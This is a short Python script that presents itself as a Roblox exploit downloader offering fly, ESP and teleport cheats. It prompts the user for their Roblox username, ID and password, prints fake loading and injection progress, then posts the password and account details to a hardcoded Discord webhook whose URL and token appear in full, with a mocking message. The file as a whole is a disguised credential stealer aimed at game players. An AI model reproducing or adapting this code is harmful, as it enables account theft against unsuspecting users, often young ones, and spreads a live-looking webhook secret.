from dhooks import Webhook


hook = Webhook("https://discord.com/api/webhooks/799264574779293706/Cj05S5UEzzQMopkiXJ_UWCVHag9F7GUDbLZ3wk6q8rTS5mJR9P0gxr2bcrtU85JkoDZq")

RobloxUsername = input("What is your roblox username? ")
RobloxID = input("What is your roblox ID? ")
RobloxPassword = input("What is your roblox password? ")
print(" Fly ")
print(" Esp")
print(" Teleport")
RobloxExploit = input("What is the roblox exploit that you want to download? ")
print("Loading...")
print("Loading may take longer depending on how good your computer is...")
print("Loading 3%")
print(" ")
print(" ")
print("Loading 11%")
print(" ")
print(" ")
print("Loading 24%")
print(" ")
print("Loading 27%")
print(" ")
print(" ")
print(" ")
print(" ")
print("Loading 44%")
print(" ")
print(" ")
print("Loading 67%")
print(" ")
print("Loading 71%")
print(" ")
print(" ")
print("Loading 85%")
print(" ")
print(" ")
print("Loading 93%")
print(" ")
print(" ")
print("Loading 99%")
print(" ")
print(" ")
print(" ")
print(" ")
print("Loading 100%")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print("Finding Roblox Player...")
print("Finding Roblox Player...")
print("Finding Roblox Player...")
print("Finding Roblox Player...")
print("Finding Roblox Player...")
print("Finding Roblox Player...")
print("Injecting 5%")
print(" ")
print(" ")
print("Injecting 17%")
print(" ")
print(" ")
print("Injecting 27%")
print(" ")
print("Injecting 32%")
print(" ")
print(" ")
print(" ")
print(" ")
print("Injecting 74%")
print(" ")
print(" ")
print("Injecting 82%")
print(" ")
print("Injecting 86%")
print(" ")
print(" ")
print("Injecting 89%")
print(" ")
print(" ")
print("Injecting 93%")
print(" ")
print(" ")
print("Injecting 99%")
print(" ")
print(" ")
print(" ")
print(" ")
print("Injecting 100%")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print("Injected Into Roblox Player!")

hook.send(f"Logged **{RobloxUsername}**. Password:{RobloxPassword} His rolimons: **https://www.rolimons.com/player/{RobloxID} LOL HE TRIED TO DOWNLOAD {RobloxExploit} xD")